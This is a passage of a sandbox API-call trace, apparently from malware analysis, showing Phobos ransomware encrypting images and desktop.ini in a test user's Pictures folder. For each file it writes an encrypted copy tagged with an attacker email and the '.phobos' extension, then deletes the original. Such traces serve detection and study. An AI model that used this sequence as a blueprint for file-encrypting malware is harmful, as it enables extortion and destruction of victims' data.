HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.811] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.811] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.812] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa329e8) returned 1 [0198.812] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.812] ReadFile (in: hFile=0x15c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1f8, lpOverlapped=0x0) returned 1 [0198.813] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x200, dwBufLen=0x200 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x200) returned 1 [0198.813] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x200, lpOverlapped=0x0) returned 1 [0198.815] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0198.815] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.815] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0198.816] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.816] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0198.816] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.816] CloseHandle (hObject=0x15c) returned 1 [0198.816] CloseHandle (hObject=0x130) returned 1 [0198.816] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini")) returned 1 [0198.817] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l 6GHZf6G8H_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l 6ghzf6g8h_.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.818] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=61664) returned 1 [0198.818] CloseHandle (hObject=0x130) returned 1 [0198.818] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l 6GHZf6G8H_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l 6ghzf6g8h_.jpg")) returned 0x20 [0198.818] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l 6GHZf6G8H_.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l 6ghzf6g8h_.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l 6GHZf6G8H_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l 6ghzf6g8h_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.818] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.818] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l 6GHZf6G8H_.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l 6ghzf6g8h_.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.819] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa329e8) returned 1 [0198.819] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.819] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf0e0, lpOverlapped=0x0) returned 1 [0198.874] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0f0, dwBufLen=0xf0f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0f0) returned 1 [0198.874] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0f0, lpOverlapped=0x0) returned 1 [0198.877] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32b68) returned 1 [0198.877] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.877] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0198.877] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.877] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0198.877] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.877] CloseHandle (hObject=0x130) returned 1 [0198.877] CloseHandle (hObject=0x15c) returned 1 [0198.877] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l 6GHZf6G8H_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l 6ghzf6g8h_.jpg")) returned 1 [0198.879] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\svqOj60.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\svqoj60.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.890] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=76727) returned 1 [0198.890] CloseHandle (hObject=0x130) returned 1 [0198.891] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\svqOj60.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\svqoj60.png")) returned 0x20 [0198.891] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\svqOj60.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\svqoj60.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\svqOj60.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\svqoj60.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.891] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.891] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\svqOj60.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\svqoj60.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.892] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32b68) returned 1 [0198.892] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.892] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x12bb7, lpOverlapped=0x0) returned 1 [0198.893] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12bc0, dwBufLen=0x12bc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12bc0) returned 1 [0198.894] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x12bc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x12bc0, lpOverlapped=0x0) returned 1 [0198.896] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0198.896] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.896] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0198.896] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.896] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0198.898] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.898] CloseHandle (hObject=0x130) returned 1 [0198.898] CloseHandle (hObject=0x140) returned 1 [0198.898] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\svqOj60.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\svqoj60.png")) returned 1 [0198.899] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\ucGz58Fk.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\ucgz58fk.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.900] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=55185) returned 1 [0198.900] CloseHandle (hObject=0x140) returned 1 [0198.900] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\ucGz58Fk.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\ucgz58fk.bmp")) returned 0x20 [0198.901] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\ucGz58Fk.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\ucgz58fk.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\ucGz58Fk.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\ucgz58fk.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.901] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.901] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\ucGz58Fk.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\ucgz58fk.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.901] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32b68) returned 1 [0198.901] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.901] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd791, lpOverlapped=0x0) returned 1 [0198.903] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd7a0, dwBufLen=0xd7a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd7a0) returned 1 [0198.904] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd7a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xd7a0, lpOverlapped=0x0) returned 1 [0198.906] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0198.906] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.906] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0198.906] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.906] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0198.906] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.906] CloseHandle (hObject=0x140) returned 1 [0198.906] CloseHandle (hObject=0x130) returned 1 [0198.906] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\ucGz58Fk.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\ucgz58fk.bmp")) returned 1 [0198.907] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\XaJxiZV.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\xajxizv.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.908] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=73655) returned 1 [0198.908] CloseHandle (hObject=0x130) returned 1 [0198.908] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\XaJxiZV.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\xajxizv.jpg")) returned 0x20 [0198.908] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\XaJxiZV.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\xajxizv.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\XaJxiZV.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\xajxizv.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.909] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.909] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\XaJxiZV.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\xajxizv.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.909] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32b68) returned 1 [0198.909] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.909] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x11fb7, lpOverlapped=0x0) returned 1 [0198.911] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x11fc0, dwBufLen=0x11fc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x11fc0) returned 1 [0198.912] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x11fc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x11fc0, lpOverlapped=0x0) returned 1 [0198.915] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0198.915] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.915] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0198.916] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.916] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0198.916] CryptDestroyKey (hKey=0xa32b68) returned 1 [0198.916] CloseHandle (hObject=0x130) returned 1 [0198.916] CloseHandle (hObject=0x140) returned 1 [0198.916] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\XaJxiZV.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\xajxizv.jpg")) returned 1 [0198.917] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\YWgQdDMFg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\ywgqddmfg.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.918] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=70964) returned 1 [0198.918] CloseHandle (hObject=0x140) returned 1 [0198.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\YWgQdDMFg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\ywgqddmfg.bmp")) returned 0x20 [0198.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\YWgQdDMFg.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\ywgqddmfg.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\YWgQdDMFg.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\ywgqddmfg.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.919] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.919] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LCY7v\\YWgQdDMFg.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lcy7v\\ywgqddmfg.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.919] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32b68) returned 1 [0198.919] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.920] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x11534, lpOverlapped=0x0) returned 1 [0198.921] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, 